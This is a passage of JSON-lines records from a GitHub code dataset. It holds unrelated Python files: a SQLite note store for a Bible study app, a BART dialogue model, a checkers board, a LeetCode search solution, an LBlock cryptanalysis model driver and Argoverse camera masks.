0:\n sum_2 += 1\n\n return (sum_1, sum_2)\n\n\n\nif __name__ == '__main__':\n input = \"2022/inputs/day4/input.txt\"\n one, two = day_4(input)\n print(f\"Part 1: {one}\")\n print(f\"Part 2: {two}\")","repo_name":"slotruglio/aoc","sub_path":"2022/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6166772585","text":"import os, re, apsw, config\nfrom util.BibleVerseParser import BibleVerseParser\nfrom util.DateUtil import DateUtil\nfrom util.TextUtil import TextUtil\n\n\nclass NoteSqlite:\n\n def __init__(self):\n # connect the note file specified in config.py > config.bibleNotes\n self.database = os.path.join(config.marvelData, config.bibleNotes)\n self.connection = apsw.Connection(self.database)\n #self.connection.setbusytimeout(500)\n self.cursor = self.connection.cursor()\n create = (\n \"CREATE TABLE IF NOT EXISTS BookNote (Book INT, Note TEXT)\",\n \"CREATE TABLE IF NOT EXISTS ChapterNote (Book INT, Chapter INT, Note TEXT)\",\n \"CREATE TABLE IF NOT EXISTS VerseNote (Book INT, Chapter INT, Verse INT, Note TEXT)\",\n )\n for statement in create:\n self.cursor.execute(statement)\n if not self.checkColumnExists(\"ChapterNote\", \"Updated\"):\n self.addColumnToTable(\"ChapterNote\", \"Updated\", \"INT\")\n self.addColumnToTable(\"ChapterNote\", \"GistId\", \"NVARCHAR(40)\")\n if not self.checkColumnExists(\"VerseNote\", \"Updated\"):\n self.addColumnToTable(\"VerseNote\", \"Updated\", \"INT\")\n self.addColumnToTable(\"VerseNote\", \"GistId\", \"NVARCHAR(40)\")\n if not self.checkColumnExists(\"BookNote\", \"Updated\"):\n self.addColumnToTable(\"BookNote\", \"Updated\", \"INT\")\n self.addColumnToTable(\"BookNote\", \"GistId\", \"NVARCHAR(40)\")\n# #self.cursor.execute(\"COMMIT\")\n\n def __del__(self):\n self.connection.close()\n\n def getBookNote(self, b):\n query = \"SELECT Note, Updated FROM BookNote WHERE Book=?\"\n self.cursor.execute(query, (b,))\n content = self.cursor.fetchone()\n if content:\n return content\n else:\n return config.thisTranslation[\"empty\"], 0\n\n def getChapterNote(self, b, c):\n query = \"SELECT Note, Updated FROM ChapterNote WHERE Book=? 
AND Chapter=?\"\n        self.cursor.execute(query, (b, c))\n        content = self.cursor.fetchone()\n        if content:\n            return content\n        else:\n            return config.thisTranslation[\"empty\"], 0\n\n    def getVerseNote(self, b, c, v):\n        query = \"SELECT Note, Updated FROM VerseNote WHERE Book=? AND Chapter=? AND Verse=?\"\n        self.cursor.execute(query, (b, c, v))\n        content = self.cursor.fetchone()\n        if content:\n            return content\n        else:\n            return config.thisTranslation[\"empty\"], 0\n\n    def displayBookNote(self, b):\n        content, updated = self.getBookNote(b)\n        #content = self.customFormat(content)\n        content = self.highlightSearch(content)\n        return content, updated\n\n    def displayChapterNote(self, b, c):\n        content, updated = self.getChapterNote(b, c)\n        #content = self.customFormat(content)\n        content = self.highlightSearch(content)\n        return content, updated\n\n    def displayVerseNote(self, b, c, v):\n        content, updated = self.getVerseNote(b, c, v)\n        #content = self.customFormat(content)\n        content = self.highlightSearch(content)\n        return content, updated\n\n    def isNotEmptyNote(self, text):\n        p = re.compile(\"<body[^<>]*?>[ \\\\r\\\\n]*?<p[^<>]*?>[ \\\\r\\\\n]*?<br />[ \\\\r\\\\n]*?</p>[ \\\\r\\\\n]*?</body>[ \\\\r\\\\n
]*?</html>\", flags=re.M)\n if p.search(text):\n return False\n else:\n return True\n\n def saveBookNote(self, b, note, updated=DateUtil.epoch()):\n delete = \"DELETE FROM BookNote WHERE Book=?\"\n self.cursor.execute(delete, (b,))\n# self.cursor.execute(\"COMMIT\")\n if note and note != config.thisTranslation[\"empty\"] and self.isNotEmptyNote(note):\n insert = \"INSERT INTO BookNote (Book, Note, Updated) VALUES (?, ?, ?)\"\n self.cursor.execute(insert, (b, note, updated))\n# self.cursor.execute(\"COMMIT\")\n\n def saveChapterNote(self, b, c, note, updated=DateUtil.epoch()):\n delete = \"DELETE FROM ChapterNote WHERE Book=? AND Chapter=?\"\n self.cursor.execute(delete, (b, c))\n# self.cursor.execute(\"COMMIT\")\n if note and note != config.thisTranslation[\"empty\"] and self.isNotEmptyNote(note):\n insert = \"INSERT INTO ChapterNote (Book, Chapter, Note, Updated) VALUES (?, ?, ?, ?)\"\n self.cursor.execute(insert, (b, c, note, updated))\n# self.cursor.execute(\"COMMIT\")\n\n def setBookNoteUpdate(self, b, c, updated):\n update = \"UPDATE BookNote set Updated=? WHERE Book=?\"\n self.cursor.execute(update, (updated, b))\n# self.cursor.execute(\"COMMIT\")\n\n def setChapterNoteUpdate(self, b, c, updated):\n update = \"UPDATE ChapterNote set Updated=? WHERE Book=? and Chapter=?\"\n self.cursor.execute(update, (updated, b, c))\n# self.cursor.execute(\"COMMIT\")\n\n def setChapterNoteContent(self, b, c, content, updated):\n update = \"UPDATE ChapterNote set Note=?, Updated=? WHERE Book=? and Chapter=?\"\n self.cursor.execute(update, (content, updated, b, c))\n# self.cursor.execute(\"COMMIT\")\n\n def saveVerseNote(self, b, c, v, note, updated=DateUtil.epoch()):\n delete = \"DELETE FROM VerseNote WHERE Book=? AND Chapter=? AND Verse=?\"\n self.cursor.execute(delete, (b, c, v))\n# #self.cursor.execute(\"COMMIT\")\n if note and note != config.thisTranslation[\"empty\"] and self.isNotEmptyNote(note):\n insert = \"INSERT INTO VerseNote (Book, Chapter, Verse, Note, Updated) VALUES (?, ?, ?, ?, ?)\"\n self.cursor.execute(insert, (b, c, v, note, updated))\n# #self.cursor.execute(\"COMMIT\")\n\n def setVerseNoteUpdate(self, b, c, v, updated):\n update = \"UPDATE VerseNote set Updated = ? WHERE Book=? and Chapter=? and Verse=?\"\n self.cursor.execute(update, (updated, b, c, v))\n# self.cursor.execute(\"COMMIT\")\n\n def setVerseNoteContent(self, b, c, v, content, updated):\n update = \"UPDATE VerseNote set Note=?, Updated=? WHERE Book=? and Chapter=? and Verse=?\"\n self.cursor.execute(update, (content, updated, b, c, v))\n# self.cursor.execute(\"COMMIT\")\n \n def getSearchedBookList(self, searchString):\n searchString = \"%{0}%\".format(searchString)\n query = TextUtil.getQueryPrefix()\n query += \"SELECT DISTINCT Book FROM BookNote WHERE Note LIKE ? ORDER BY Book\"\n self.cursor.execute(query, (searchString,))\n standardAbbreviation = BibleVerseParser(config.parserStandarisation).standardAbbreviation\n return [\"<ref onclick='document.title=\\\"_openbooknote:::{0}\\\"'>{1}</ref>\".format(book[0], standardAbbreviation[str(book[0])]) for book in self.cursor.fetchall()]\n\n def getSearchedChapterList(self, searchString):\n searchString = \"%{0}%\".format(searchString)\n query = TextUtil.getQueryPrefix()\n query += \"SELECT DISTINCT Book, Chapter FROM ChapterNote WHERE Note LIKE ? 
ORDER BY Book, Chapter\"\n self.cursor.execute(query, (searchString,))\n parser = BibleVerseParser(config.parserStandarisation)\n return [\"<ref onclick='document.title=\\\"_openchapternote:::{0}.{1}\\\"'>{2}</ref>\".format(book, chapter, parser.bcvToVerseReference(book, chapter, 1)[:-2]) for book, chapter in self.cursor.fetchall()]\n\n def getSearchedVerseList(self, searchString):\n searchString = \"%{0}%\".format(searchString)\n query = TextUtil.getQueryPrefix()\n query += \"SELECT DISTINCT Book, Chapter, Verse FROM VerseNote WHERE Note LIKE ? ORDER BY Book, Chapter, Verse\"\n self.cursor.execute(query, (searchString,))\n parser = BibleVerseParser(config.parserStandarisation)\n return [\"<ref onclick='document.title=\\\"_openversenote:::{0}.{1}.{2}\\\"'>{3}</ref>\".format(book, chapter, verse, parser.bcvToVerseReference(book, chapter, verse)) for book, chapter, verse in self.cursor.fetchall()]\n\n def getChapterVerseList(self, b, c):\n query = \"SELECT DISTINCT Verse FROM VerseNote WHERE Book=? AND Chapter=? ORDER BY Verse\"\n self.cursor.execute(query, (b, c))\n return [verse[0] for verse in self.cursor.fetchall()]\n\n def isBookNote(self, b):\n query = \"SELECT DISTINCT Book FROM BookNote WHERE Book=?\"\n self.cursor.execute(query, (b,))\n if self.cursor.fetchone():\n return True\n else:\n return False\n\n def isChapterNote(self, b, c):\n query = \"SELECT DISTINCT Chapter FROM ChapterNote WHERE Book=? AND Chapter=?\"\n self.cursor.execute(query, (b, c))\n if self.cursor.fetchone():\n return True\n else:\n return False\n\n def highlightSearch(self, content):\n highlight = config.noteSearchString\n if highlight and not highlight == \"z\":\n content = re.sub(\"(\"+highlight+\")\", r\"<z>\\1</z>\", content, flags=re.IGNORECASE)\n content = TextUtil.fixTextHighlighting(content)\n # add an id so as to scroll to the first result\n content = re.sub(\"<z>\", \"<span id='v{0}.{1}.{2}'></span><z>\".format(config.studyB, config.studyC, config.studyV), content, count=1)\n return content\n\n def getAllBooks(self):\n query = \"SELECT Book, 0, 0, Note, Updated FROM BookNote ORDER BY Book\"\n self.cursor.execute(query)\n content = self.cursor.fetchall()\n return content\n\n def getAllChapters(self):\n query = \"SELECT Book, Chapter, 0, Note, Updated FROM ChapterNote ORDER BY Book, Chapter\"\n self.cursor.execute(query)\n content = self.cursor.fetchall()\n return content\n\n def getAllVerses(self):\n query = \"SELECT Book, Chapter, Verse, Note, Updated FROM VerseNote ORDER BY Book, Chapter, Verse\"\n self.cursor.execute(query)\n content = self.cursor.fetchall()\n return content\n\n def getBookCount(self):\n query = \"SELECT count(*) FROM BookNote\"\n dataCopy = self.cursor.execute(query)\n result = dataCopy.fetchone()\n return result[0]\n\n def getChapterCount(self):\n query = \"SELECT count(*) FROM ChapterNote\"\n dataCopy = self.cursor.execute(query)\n result = dataCopy.fetchone()\n return result[0]\n\n def getVerseCount(self):\n query = \"SELECT count(*) FROM VerseNote\"\n dataCopy = self.cursor.execute(query)\n result = dataCopy.fetchone()\n return result[0]\n\n def deleteAllNotes(self):\n self.deleteBookNotes()\n self.deleteChapterNotes()\n self.deleteVerseNotes()\n\n def deleteBookNotes(self):\n self.cursor.execute(\"DELETE FROM BookNote\")\n# self.cursor.execute(\"COMMIT\")\n\n def deleteChapterNotes(self):\n self.cursor.execute(\"DELETE FROM ChapterNote\")\n# self.cursor.execute(\"COMMIT\")\n\n def deleteVerseNotes(self):\n self.cursor.execute(\"DELETE FROM VerseNote\")\n# 
self.cursor.execute(\"COMMIT\")\n\n def checkColumnExists(self, table, column):\n self.cursor.execute(\"SELECT * FROM pragma_table_info(?) WHERE name=?\", (table, column))\n if self.cursor.fetchone():\n return True\n else:\n return False\n\n def addColumnToTable(self, table, column, column_type):\n sql = \"ALTER TABLE \" + table + \" ADD COLUMN \" + column + \" \" + column_type\n self.cursor.execute(sql)\n\n\n# Only used for test\n\n# def test_deleteAllNotes():\n# ns = NoteSqlite()\n# ns.deleteAllNotes()\n\ndef test_printAllCount():\n ns = NoteSqlite()\n print(\"Books: {0}\".format(ns.getBookCount()))\n print(\"Chapters: {0}\".format(ns.getChapterCount()))\n print(\"Verses: {0}\".format(ns.getVerseCount()))\n\nif __name__ == \"__main__\":\n\n test_printAllCount()\n\n\n","repo_name":"eliranwong/UniqueBible","sub_path":"db/NoteSqlite.py","file_name":"NoteSqlite.py","file_ext":"py","file_size_in_byte":11648,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"40536891760","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import CrossEntropyLoss\nimport torch.nn.functional as F\n\nimport warnings\n\nfrom transformers.modeling_bart import (\n BartModel,\n BartDecoder,\n BartForConditionalGeneration,\n _prepare_bart_decoder_inputs,\n shift_tokens_right,\n BaseModelOutput,\n Seq2SeqModelOutput,\n Seq2SeqLMOutput\n)\n\nfrom dataloaders import MAX_UTTERANCE_NUM, MAX_SPEAKER_NUM\nfrom models.HGT import bart_modify\n\nclass TXHModel(BartModel):\n def __init__(self, config, args):\n super(BartModel, self).__init__(config)\n\n padding_idx, vocab_size = config.pad_token_id, config.vocab_size\n self.shared = nn.Embedding(vocab_size, config.d_model, padding_idx)\n\n self.encoder = bart_modify.TXHEncoder(config, self.shared, args)\n self.decoder = BartDecoder(config, self.shared)\n\n self.ans_embeddings = nn.Embedding(3, config.d_model)\n\n self.init_weights()\n\n def forward(\n self,\n input_ids,\n graph,\n attention_mask=None,\n decoder_input_ids=None,\n decoder_attention_mask=None,\n encoder_outputs=None,\n decoder_ans_idxs=None,\n decoder_ans_from=None,\n past_key_values=None,\n use_cache=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n **kwargs,\n ):\n if \"decoder_past_key_values\" in kwargs:\n warnings.warn(\n \"The `decoder_past_key_values` argument is deprecated and will be removed in a future version, use `past_key_values` instead.\",\n FutureWarning,\n )\n past_key_values = kwargs.pop(\"decoder_past_key_values\")\n\n if decoder_input_ids is None:\n use_cache = False\n\n output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions\n output_hidden_states = (\n output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states\n )\n use_cache = use_cache if use_cache is not None else self.config.use_cache\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n # make masks if user doesn't supply\n if not use_cache:\n decoder_input_ids, decoder_padding_mask, causal_mask = _prepare_bart_decoder_inputs(\n self.config,\n input_ids,\n decoder_input_ids=decoder_input_ids,\n decoder_padding_mask=decoder_attention_mask,\n causal_mask_dtype=self.shared.weight.dtype,\n )\n else:\n decoder_padding_mask, causal_mask = None, None\n\n assert decoder_input_ids is not None\n\n if encoder_outputs is None:\n encoder_outputs = self.encoder(\n graph=graph,\n input_ids=input_ids,\n 
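# note: the HGT-modified TXHEncoder also consumes the utterance graph, unlike the stock BART encoder\n                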
attention_mask=attention_mask,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n # If the user passed a tuple for encoder_outputs, we wrap it in a BaseModelOutput when return_dict=False\n elif return_dict and not isinstance(encoder_outputs, BaseModelOutput):\n encoder_outputs = BaseModelOutput(\n last_hidden_state=encoder_outputs[0],\n hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,\n attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,\n )\n\n # deal with NAN for invaild example. \n # encoder_outputs[0][encoder_outputs[0].isnan()] = 0.0\n encoder_output_embeddings = encoder_outputs[0].reshape(-1, MAX_UTTERANCE_NUM*encoder_outputs[0].shape[1], encoder_outputs[0].shape[2])\n \n ans_total = torch.zeros(encoder_outputs[0].shape[0], dtype=decoder_ans_idxs.dtype, device=decoder_ans_idxs.device).view(-1, MAX_UTTERANCE_NUM)\n ans_total = ans_total.scatter_add(dim=1, index=decoder_ans_idxs.unsqueeze(1), src=torch.ones_like(ans_total)+1).scatter_add(dim=1, index=decoder_ans_from.unsqueeze(1), src=torch.ones_like(ans_total))\n ans_embeddings = self.ans_embeddings(ans_total).unsqueeze(2).repeat(1, 1, encoder_outputs[0].shape[1], 1).view_as(encoder_output_embeddings)\n\n # decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn)\n decoder_outputs = self.decoder(\n decoder_input_ids,\n encoder_output_embeddings + ans_embeddings,\n attention_mask.reshape(-1, MAX_UTTERANCE_NUM*attention_mask.shape[1]) if attention_mask is not None else None,\n decoder_padding_mask,\n decoder_causal_mask=causal_mask,\n past_key_values=past_key_values,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n\n if not return_dict:\n return decoder_outputs + encoder_outputs\n\n return Seq2SeqModelOutput(\n last_hidden_state=decoder_outputs.last_hidden_state,\n past_key_values=decoder_outputs.past_key_values,\n decoder_hidden_states=decoder_outputs.hidden_states,\n decoder_attentions=decoder_outputs.attentions,\n cross_attentions=decoder_outputs.cross_attentions,\n encoder_last_hidden_state=encoder_outputs.last_hidden_state,\n encoder_hidden_states=encoder_outputs.hidden_states,\n encoder_attentions=encoder_outputs.attentions,\n )\n\n\nclass TXHGenerationModel(BartForConditionalGeneration):\n\n def __init__(self, config, args):\n super(BartForConditionalGeneration, self).__init__(config)\n base_model = TXHModel(config, args)\n self.model = base_model\n self.register_buffer(\"final_logits_bias\", torch.zeros((1, self.model.shared.num_embeddings)))\n\n def forward(\n self,\n input_ids,\n graph=None,\n attention_mask=None,\n decoder_input_ids=None,\n decoder_attention_mask=None,\n encoder_outputs=None,\n past_key_values=None,\n labels=None,\n decoder_ans_idxs=None,\n decoder_ans_from=None,\n use_cache=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n **unused,\n ):\n r\"\"\"\n labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):\n Labels for computing the masked language modeling loss. Indices should either be in ``[0, ...,\n config.vocab_size]`` or -100 (see ``input_ids`` docstring). 
Tokens with indices set to ``-100`` are ignored\n (masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]``.\n\n Returns:\n\n Conditional generation example::\n\n >>> # Mask filling only works for bart-large\n >>> from transformers import BartTokenizer, BartForConditionalGeneration\n >>> tokenizer = BartTokenizer.from_pretrained('facebook/bart-large')\n >>> TXT = \"My friends are <mask> but they eat too many carbs.\"\n\n >>> model = BartForConditionalGeneration.from_pretrained('facebook/bart-large')\n >>> input_ids = tokenizer([TXT], return_tensors='pt')['input_ids']\n >>> logits = model(input_ids).logits\n\n >>> masked_index = (input_ids[0] == tokenizer.mask_token_id).nonzero().item()\n >>> probs = logits[0, masked_index].softmax(dim=0)\n >>> values, predictions = probs.topk(5)\n\n >>> tokenizer.decode(predictions).split()\n >>> # ['good', 'great', 'all', 'really', 'very']\n \"\"\"\n if \"lm_labels\" in unused:\n warnings.warn(\n \"The `lm_labels` argument is deprecated and will be removed in a future version, use `labels` instead.\",\n FutureWarning,\n )\n labels = unused.pop(\"lm_labels\")\n if \"decoder_cached_states\" in unused:\n warnings.warn(\n \"The `decoder_cached_states` argument is deprecated and will be removed in a future version, use `past_key_values` instead.\",\n FutureWarning,\n )\n past_key_values = unused.pop(\"decoder_cached_states\")\n if \"decoder_past_key_values\" in unused:\n warnings.warn(\n \"The `decoder_past_key_values` argument is deprecated and will be removed in a future version, use `past_key_values` instead.\",\n FutureWarning,\n )\n past_key_values = unused.pop(\"decoder_past_key_values\")\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n if labels is not None:\n use_cache = False\n if decoder_input_ids is None:\n decoder_input_ids = shift_tokens_right(labels, self.config.pad_token_id)\n\n outputs = self.model(\n input_ids,\n graph,\n attention_mask=attention_mask,\n decoder_input_ids=decoder_input_ids,\n encoder_outputs=encoder_outputs,\n decoder_attention_mask=decoder_attention_mask,\n decoder_ans_idxs=decoder_ans_idxs,\n decoder_ans_from=decoder_ans_from,\n past_key_values=past_key_values,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n lm_logits = F.linear(outputs[0], self.model.shared.weight, bias=self.final_logits_bias)\n\n masked_lm_loss = None\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n # TODO(SS): do we need to ignore pad tokens in labels?\n masked_lm_loss = loss_fct(lm_logits.view(-1, self.config.vocab_size), labels.view(-1))\n\n if not return_dict:\n output = (lm_logits,) + outputs[1:]\n return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output\n\n return Seq2SeqLMOutput(\n loss=masked_lm_loss,\n logits=lm_logits,\n past_key_values=outputs.past_key_values,\n decoder_hidden_states=outputs.decoder_hidden_states,\n decoder_attentions=outputs.decoder_attentions,\n cross_attentions=outputs.cross_attentions,\n encoder_last_hidden_state=outputs.encoder_last_hidden_state,\n encoder_hidden_states=outputs.encoder_hidden_states,\n encoder_attentions=outputs.encoder_attentions,\n )\n \n \n def prepare_inputs_for_generation(\n self, decoder_input_ids, past=None, attention_mask=None, use_cache=None, encoder_outputs=None, graph=None, decoder_ans_idxs=None, decoder_ans_from=None, **kwargs\n ):\n return {\n \"input_ids\": None, # encoder_outputs is 
defined. input_ids not needed\n \"graph\": graph,\n \"encoder_outputs\": encoder_outputs,\n \"past_key_values\": past,\n \"decoder_input_ids\": decoder_input_ids,\n \"attention_mask\": attention_mask,\n \"decoder_ans_idxs\": decoder_ans_idxs,\n \"decoder_ans_from\": decoder_ans_from,\n \"use_cache\": use_cache, # change this to avoid caching (presumably for debugging)\n }\n\n def _prepare_decoder_input_ids_for_generation(\n self, input_ids: torch.LongTensor, decoder_start_token_id: int = None, bos_token_id: int = None, **model_kwargs\n ) -> torch.LongTensor:\n\n if \"decoder_input_ids\" in model_kwargs:\n return model_kwargs[\"decoder_input_ids\"]\n\n decoder_start_token_id = self._get_decoder_start_token_id(decoder_start_token_id, bos_token_id)\n decoder_input_ids = (\n torch.ones((input_ids.shape[0]//MAX_UTTERANCE_NUM, 1), dtype=input_ids.dtype, device=input_ids.device)\n * decoder_start_token_id\n )\n return decoder_input_ids","repo_name":"lxchtan/HeterMPC","sub_path":"models/heterbart.py","file_name":"heterbart.py","file_ext":"py","file_size_in_byte":11132,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"34991798391","text":"class Piece:\n\t\t\n\t\tdef __init__(self,piece_color,piece_type):\n\t\t\t\n\t\t\tif piece_color in ('B','W'):\n\t\t\t\tself.piece_color=piece_color\n\t\t\t\t\n\t\t\t\tif piece_color=='B':\n\t\t\t\t\tself.disp_col='\\033[1;34m'\n\t\t\t\t\t\n\t\t\t\telif piece_color=='W':\n\t\t\t\t\tself.disp_col='\\033[1;37m'\n\t\t\t\t\t\n\t\t\telse: \n\t\t\t\traise NameError('Piece color has to be B or W')\n\t\t\t\n\t\t\tif piece_type in ('P','Q'):\n\t\t\t\tself.piece_type=piece_type\n\t\t\telse:\n\t\t\t\traise NameError('Piece type has to be P or Q')\t\t\t\n\n\nclass Board:\n\n \n\tdef __init__(self,game_version):\n\t\tself.game_version=game_version\n\t\t\n\t\tif game_version=='International':\n\t\t\tself.grid= [['.'] * 10 for i in range(10)]\n\t\t\tself.size_b=10\n\t\n\t\telif game_version in ('British','American','Russian'):\n\t\t\tself.grid=[['.'] * 8 for i in range(8)]\t\n\t\t\tself.size_b=8\n \n\t\telse:\n\t\t\traise NameError('Incorrect version specified: must be American, British, Russian or International')\n\t\t\n\t\t\n\t\t\t\n\tdef display_grid(self):\n\t\tcol_numerals=[str(i) for i in range(0,self.size_b)]\n\t\t\n\t\tprint(' '+ ' '.join(col_numerals)) \n\t\t\t\n\t\tticker=0\n \n\t\tfor line in self.grid:\n\t\t\tprint(ticker,end='')\n\t\t\t\n\t\t\tticker+=1\n\t\t\t\n\t\t\tfor obj in line:\n\t\t\t\tif isinstance(obj,str) and obj=='.': \n\t\t\t\t\tprint('|'+obj,end='')\n\t\t\t\t\t\n\t\t\t\telif isinstance(obj,Piece):\n\t\t\t\t\tprint('|'+ obj.disp_col + obj.piece_type + '\\033[0m',end='') \n\t\t\t\t\n\t\t\t\telse: \n\t\t\t\t\traise NameError('Unidentified piece spotted') \n\t\t\t\n\t\t\tprint('|')\n\t\n\t\tprint('\\n') \n\t\n\t\n\tdef valid_coord(self,coordinate):\n\t\t\n\t\treturn coordinate<self.size_b and coordinate>=0 and isinstance(coordinate,int)\n\t\n\tdef add_piece(self,piece,coord1,coord2):\n\t\tif self.valid_coord(coord1) and self.valid_coord(coord2):\n\t\t\t\n\t\t\tif isinstance(piece,Piece):\n\t\t\t\t\n\t\t\t\tif isinstance(self.grid[coord1][coord2],Piece):\n\t\t\t\t\traise NameError('We already have a piece at the current place')\n\t\t\t\t\n\t\t\t\telse:\t\n\t\t\t\t\tself.grid[coord1][coord2]=piece\n\t\t\t\n\t\t\telse:\n\t\t\t\traise NameError('Add piece did not get a piece as argument ')\t\n\t\t\n\t\telse:\n\t\t\traise NameError('Invalid coordinates given when adding a piece')\t \n \n\n \ndef 
main():\n\n\t\tboard1=Board('British')\n\t\tboard1.display_grid()\n\t\tpiece1=Piece('B','P')\n\t\tpiece2=Piece('W','P')\n\t\tboard1.add_piece(piece1,1,1)\n\t\tboard1.add_piece(piece2,6,4)\n\t\tboard1.display_grid()\t\n\n\t\treturn 0\n \n \n\nif __name__ == '__main__':\n import sys\n sys.exit(main())\n","repo_name":"sonia211/Chequers","sub_path":"source_code.py","file_name":"source_code.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"31301088805","text":"from MITMLBlock import *\r\n\r\n\r\n\r\n\r\nLB = MITM_Lblock(\"LB\", 4, 64, 11,4,80)\r\nLB.genModel_keyrecovery(r\".\\Solution\\LB_r5_r11_r5.lp\", 5, 5, 2)\r\nLB.genModel(r\".\\Solution\\LB_r11.lp\", 11)\r\n\r\n\r\n\r\nfrom LblockDistinguisherDrawer import *\r\nfrom LblockKeyrecoveryDrawer import *\r\nfrom LblockKeyscheduleDrawer import *\r\nFigDistinguisher = DrawDistinguisher(r\".\\Solution\\LB_r5_r11_r5.sol\", 11)\r\nFigDistinguisher.draw(r\".\\Figure\\Distinguisher_LB.tex\")\r\n\r\nFigKeyrecovery = DrawKeyrecovery(r\".\\Solution\\LB_r5_r11_r5.sol\", 11, 5, 5)\r\nFigKeyrecovery.draw(r\".\\Figure\\Keyrecovey_LB.tex\")\r\nFigKeyrecovery.drawGuessedValue(r\".\\Figure\\GuessedValue_LB.tex\")\r\n\r\nFigKeyschedule = DrawKeyschedule(r\".\\Solution\\LB_r5_r11_r5.sol\", 11, 5, 5, 2)\r\nFigKeyschedule.draw(r\".\\Figure\\Keyschedule_LB.tex\")\r\n\r\n","repo_name":"mhgharieb/MITM","sub_path":"Lblock/cmd_LB.py","file_name":"cmd_LB.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17214465334","text":"class Solution:\n    def searchInsert(self, nums, target):\n        \"\"\"\n        Using Binary search, best run time 56ms beats 88%. 
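Worked calls, added for illustration (hypothetical inputs), one per return path:

        >>> Solution().searchInsert([1, 3, 5, 6], 5)   # exact match found inside the loop
        2
        >>> Solution().searchInsert([1, 3, 5, 6], 2)   # loop exits; nums[left] >= target
        1
        >>> Solution().searchInsert([1, 3, 5, 6], 7)   # loop exits; left ran past the end
        4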
It seems like for this question if you use linear search is faster than this binary search approach I guess it's because the test cases are all small, but if a larger array is served as one of the test case then I am sure that binary search is more efficient (tried using binary search, and best run time is 52ms beats 98%)\n \"\"\"\n left, right = 0, len(nums) - 1\n while left <= right:\n m = (left + right) // 2\n if nums[m] == target:\n return m\n elif nums[m] > target:\n right = m - 1\n else:\n left = m + 1\n \n if left > len(nums) - 1 or nums[left] >= target:\n return left\n else:\n return left + 1","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/tricky/35_SearchInsertPosition.py","file_name":"35_SearchInsertPosition.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8184611461","text":"import av2.utils.raster as raster_utils\nimport numpy as np\n\n\n# front-center camera has `portrait-mode` aspect ratio.\nTBV_RING_FRONT_CENTER_IMG_HEIGHT = 2048\nTBV_RING_FRONT_CENTER_IMG_WIDTH = 1550\n\nTBV_RING_REAR_RIGHT_IMG_HEIGHT = 775\nTBV_RING_REAR_RIGHT_IMG_WIDTH = 1024\n\nTBV_RING_REAR_LEFT_IMG_HEIGHT = 775\nTBV_RING_REAR_LEFT_IMG_WIDTH = 1024\n\n\ndef filter_out_egovehicle(uv: np.ndarray, camera_name: str) -> np.ndarray:\n \"\"\"Mask out the immediate foreground (pixels belonging to egovehicle) for any camera.\n\n Note: only 3 of the 7 ring cameras see the egovehicle in their field of view.\n Do not shoot ray into egovehicle hood or body (mask out foreground)\n\n Args:\n uv: array of shape (N,2)\n camera_name: string representing the name of a ring camera.\n\n Returns:\n logicals: array of shape (N,) corresponding to pixels NOT capturing the egovehicle.\n \"\"\"\n # update assumptions\n if camera_name == \"ring_front_center\":\n egovehicle_mask = get_z1_ring_front_center_mask()\n elif camera_name == \"ring_rear_right\":\n egovehicle_mask = get_z1_ring_rear_right_mask()\n elif camera_name == \"ring_rear_left\":\n egovehicle_mask = get_z1_ring_rear_left_mask()\n\n valid_mask = ~egovehicle_mask\n\n y = uv[:, 1]\n x = uv[:, 0]\n logicals = valid_mask[y, x] != 0\n return logicals\n\n\ndef get_z1_ring_front_center_mask() -> np.ndarray:\n \"\"\"Provide mask for the immediate foreground (pixels belonging to egovehicle), for the ring front center camera.\n\n Returns:\n mask: boolean array of shape (H,W)\n \"\"\"\n polygon_verts = np.array(\n [[0, 2048], [0, 1887], [303, 1804], [602, 1765], [951, 1780], [1256, 1800], [1544, 1880], [1549, 2048]]\n )\n mask = raster_utils.get_mask_from_polygons(\n [polygon_verts], img_h=TBV_RING_FRONT_CENTER_IMG_HEIGHT, img_w=TBV_RING_FRONT_CENTER_IMG_WIDTH\n )\n return mask.astype(bool)\n\n\ndef get_z1_ring_rear_right_mask() -> np.ndarray:\n \"\"\"Provide mask for the immediate foreground (pixels belonging to egovehicle), for the ring rear right camera.\n\n Returns:\n mask: boolean array of shape (H,W)\n \"\"\"\n polygon_verts = np.array(\n [[511, 1549], [511, 1540], [985, 1376], [1203, 1334], [1405, 1305], [2046, 1318], [2047, 1549]], dtype=float\n )\n polygon_verts *= 0.5 # rear has half the resolution as ring_front_center.\n mask = raster_utils.get_mask_from_polygons(\n [polygon_verts], img_h=TBV_RING_REAR_RIGHT_IMG_HEIGHT, img_w=TBV_RING_REAR_RIGHT_IMG_WIDTH\n )\n return mask.astype(bool)\n\n\ndef get_z1_ring_rear_left_mask() -> 